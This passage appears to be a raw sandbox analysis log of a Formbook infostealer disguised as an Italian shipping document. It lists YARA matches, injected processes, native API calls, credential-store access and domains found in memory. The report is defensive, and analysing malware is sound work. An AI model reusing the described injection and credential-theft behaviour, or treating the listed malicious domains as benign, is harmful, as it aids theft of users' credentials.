            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006EC4000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000005A14000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.00000000370A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/pk64/?4rl8h=D2L
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: AWB_5771388044 Documenti di spedizione.exe
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004FC303 NtClose,1_2_004FC303
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72C70 NtFreeVirtualMemory,1_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05074650 NtSuspendThread,LdrInitializeThunk,6_2_05074650
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05074340 NtSetContextThread,LdrInitializeThunk,6_2_05074340
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072D10 NtMapViewOfSection,LdrInitializeThunk,6_2_05072D10
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_05072D30
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072DD0 NtDelayExecution,LdrInitializeThunk,6_2_05072DD0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_05072DF0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072C60 NtCreateKey,LdrInitializeThunk,6_2_05072C60
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_05072C70
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_05072CA0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072F30 NtCreateSection,LdrInitializeThunk,6_2_05072F30
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072FB0 NtResumeThread,LdrInitializeThunk,6_2_05072FB0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072FE0 NtCreateFile,LdrInitializeThunk,6_2_05072FE0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072EE0 NtQueueApcThread,LdrInitializeThunk,6_2_05072EE0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072B60 NtClose,LdrInitializeThunk,6_2_05072B60
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072AD0 NtReadFile,LdrInitializeThunk,6_2_05072AD0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072AF0 NtWriteFile,LdrInitializeThunk,6_2_05072AF0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_050735C0 NtCreateMutant,LdrInitializeThunk,6_2_050735C0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_050739B0 NtGetContextThread,LdrInitializeThunk,6_2_050739B0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072D00 NtSetInformationFile,6_2_05072D00
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072DB0 NtEnumerateKey,6_2_05072DB0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072C00 NtQueryInformationProcess,6_2_05072C00
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072CC0 NtQueryVirtualMemory,6_2_05072CC0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072CF0 NtOpenProcess,6_2_05072CF0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072F60 NtCreateProcessEx,6_2_05072F60
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072F90 NtProtectVirtualMemory,6_2_05072F90
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072FA0 NtQuerySection,6_2_05072FA0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072E30 NtWriteVirtualMemory,6_2_05072E30
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072E80 NtReadVirtualMemory,6_2_05072E80
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072EA0 NtAdjustPrivilegesToken,6_2_05072EA0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072B80 NtQueryInformationFile,6_2_05072B80
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072BA0 NtEnumerateValueKey,6_2_05072BA0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072BE0 NtQueryValueKey,6_2_05072BE0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072BF0 NtAllocateVirtualMemory,6_2_05072BF0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05072AB0 NtWaitForSingleObject,6_2_05072AB0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05073010 NtOpenDirectoryObject,6_2_05073010
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05073090 NtSetValueKey,6_2_05073090
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05073D10 NtOpenProcessToken,6_2_05073D10
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_05073D70 NtOpenThread,6_2_05073D70
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_02B58ED0 NtReadFile,6_2_02B58ED0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_02B58FC0 NtDeleteFile,6_2_02B58FC0
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_02B58D60 NtCreateFile,6_2_02B58D60
            Source: C:\Windows\SysWOW64\taskkill.exe Code function: 6_2_02B59060 NtClose,6_2_02B59060
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1743888641.0000000004803000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documenti di spedizione.exe
            Source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1743023281.00000000049AD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AWB_5771388044 Documenti di spedizione.exe
            Source: AWB_5771388044 Documenti di spedizione.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@9/8
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0047839D
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe File created: C:\Users\user\AppData\Local\Temp\Sancha
            Source: AWB_5771388044 Documenti di spedizione.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: taskkill.exe, 00000006.00000003.2306418108.0000000003154000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.0000000003154000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2306247497.0000000003133000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: AWB_5771388044 Documenti di spedizione.exe ReversingLabs: Detection: 68%
            Source: AWB_5771388044 Documenti di spedizione.exe Virustotal: Detection: 47%
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe File read: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
            Source: unknown Process created: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
            Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\taskkill.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: AWB_5771388044 Documenti di spedizione.exe Static file information: File size 1398875 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3591578337.000000000028E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
